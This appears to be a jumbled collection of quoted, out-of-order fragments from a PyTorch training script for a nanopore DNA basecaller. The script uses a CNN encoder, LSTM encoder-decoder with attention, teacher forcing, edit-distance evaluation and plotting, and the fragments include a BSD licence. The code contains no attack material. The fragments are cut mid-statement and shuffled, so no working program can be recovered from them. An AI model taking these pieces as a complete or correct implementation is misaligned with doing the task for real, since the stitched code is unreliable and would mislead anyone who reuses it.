"outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and",
"start self.end = end def __eq__(self, other): return self.start <= other <= self.end",
"== 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(),",
"(batch_size, out_dim) #decide if we are going to use teacher forcing or not",
"for LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item()",
"n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio",
"the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs)",
"cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization =",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end",
"= y[:, :, i] # batch, features, seq len if self.attention: # ATTENTION",
"hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder",
"if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration",
"sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1,",
"and decoder optimizer.step() if (val_ds != None) and (updates % make_validation == 0):",
"earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias",
"dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train",
"val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(),",
"model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={},",
"forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in",
"Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle input file.\")",
"3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend()",
"{}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if",
"torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop:",
"argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle input",
"list of conditions and the following disclaimer. 2. Redistributions in binary form must",
"if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay,",
"+ (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy =",
"for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early",
"LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self,",
"if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \",",
"features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :,",
"len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11) m",
"for epoch in p.keys(): if epoch % print_epoch == 0 or epoch ==",
"with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname)",
"return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500,",
"data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size",
"HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,",
"and the following disclaimer in the documentation and/or other materials provided with the",
"lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq,",
"0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val =",
"edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings",
"input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token]",
"Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder",
"teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation set",
"= argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle",
"model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in",
"notice, this list of conditions and the following disclaimer in the documentation and/or",
"COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,",
"mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size",
"# undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder",
"type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight",
"forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing",
"import torch.nn.functional as F import torchvision import pickle import random import time import",
"reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) ==",
"for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters():",
"2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio,",
"np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx]",
"self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port",
"lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and",
"def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for",
"forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd:",
"name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234,",
"self.end = end def __eq__(self, other): return self.start <= other <= self.end def",
"self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2",
"return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2],",
"= script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data",
").sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: #",
"parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0,",
"labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### ####",
"outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4 # ordering",
"Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size",
"1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in",
"def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val",
"default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500,",
"0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100)",
"in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h",
"= input_decoder[not_padded_batches, :] # get only batches that are NOT padded h =",
"dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if",
"for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] ==",
"else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll",
"= args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder =",
"1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if",
"help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\")",
"true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass",
"out_size # Calculate cross entropy loss # output = (seq*batch, out dim), target",
"acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2))",
"dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p",
"dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc",
"float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing",
"u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in",
"= lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\"",
"label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create",
"val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\")",
"teacher forcing, use actual next token as next input #if not, use predicted",
"labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x",
"save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds))",
"= outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1,",
"LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING",
"lr = args.learning_rate editD = args.editD sgd = False out_classes = 5 random.seed(SEED)",
"are NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :]",
"# batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value =",
"'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1])",
"epoch in p.keys(): if epoch % print_epoch == 0 or epoch == max(p.keys()):",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train],",
"= n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) #",
"= np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if epoch",
"forward(self, x, hidden): h, c = hidden h = h.view(x.size(0), -1) c =",
"entropy loss # output = (seq*batch, out dim), target = (seq*batch) # Target",
"a and b both have shape (num_layers, batch_size, hidden_dim). # Sort instances by",
"/ math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h,",
"+ 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy:",
"(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF",
"1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim)",
"# break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc =",
"original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx,",
"len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\")",
"\"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for idx,",
"svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if",
"val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3]",
"= None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer,",
"/ float(iteration + 1)))) if updates % make_validation == 0: print(\"=\" * 30)",
"reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias,",
"= args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden",
"on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0",
"= bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm,",
"old_ed # # old_ed = ed2 # epoch_editd += ed # running_editd_train +=",
"+ \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD)",
"right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))),",
"conditions and the following disclaimer in the documentation and/or other materials provided with",
"iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x",
"acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings",
"result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None,",
"not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val =",
"(forgetgate * c) + (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\",",
"attention self.dropout = dropout # Define the LSTM layer if self.bidirectional: if self.attention:",
"[] val_acc = [] val_editd = [] model.eval() total_ed = 0 total_num_chars =",
"parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\")",
"attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim",
"= {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd =",
"updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\")",
"from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder",
"SUCH DAMAGE. \"\"\" import h5py import numpy as np import os import sys",
"= 0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx]",
"ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration",
"#Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm,",
"Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)),",
"the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p",
"0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :]",
"batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels,",
"= reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val = criterion(reshaped_output_val,",
"f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4]))",
"val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val",
"above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions",
"* 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim)",
"= {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd =",
"label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx)",
"name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0)",
"# CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out =",
"vs. updates from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path",
"+ 1)))) if updates % make_validation == 0: print(\"=\" * 30) print(\"batch {}",
"torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token] for i",
"int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number of",
"plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0,",
"the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value)",
"= fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error",
"np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates",
"numpy as np import os import sys import torch import torch.nn as nn",
"distance vs. updates from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size",
"Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is",
"state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths):",
"forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher",
"+ \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in",
"= true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder =",
"random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted,",
"torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import pandas as pd",
"list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized",
"= 1 [batch size, SOS token] for i in max_for: # Stop looping",
"label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle)",
"the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS",
"len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs.",
"validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None,",
"if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0,",
"mode_type, beam_width=1): # Forward pass through LSTM layer # shape of lstm_in: [batch,",
"+ n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len",
"# batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0,",
"true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder",
"for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs.",
"import sys import torch import torch.nn as nn from torch.autograd import Variable import",
"len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256,",
"EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool",
"data[3] batch_y10 = data[4] #Wrap them in a Variable object inputs, labels, labels10",
"input_decoder = input_decoder[not_padded_batches, :] # get only batches that are NOT padded h",
"and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train,",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF",
"num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention =",
"input gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2)",
"label if teacher_force else onehot # [batch size, out dim] return outputs, hidden",
"file_out = script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as handle:",
"get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element",
"args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio",
"in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from",
"def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1],",
"args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience",
"= hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder =",
"lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\" assert",
"check if it has decresed, # and if it has, it will make",
"encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder",
"plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys())",
"reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if",
"# Calculate cross entropy loss # output = (seq*batch, out dim), target =",
"input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input",
"plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in",
"encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred,",
"max_for: # Stop looping if we got to the last element in the",
"str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates=",
":], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied =",
"train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \",",
"sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0",
"unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original =",
"max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token",
"([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in,",
"else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\"",
"nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0),",
"# The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder,",
"get argmax of prediction #if teacher forcing, use actual next token as next",
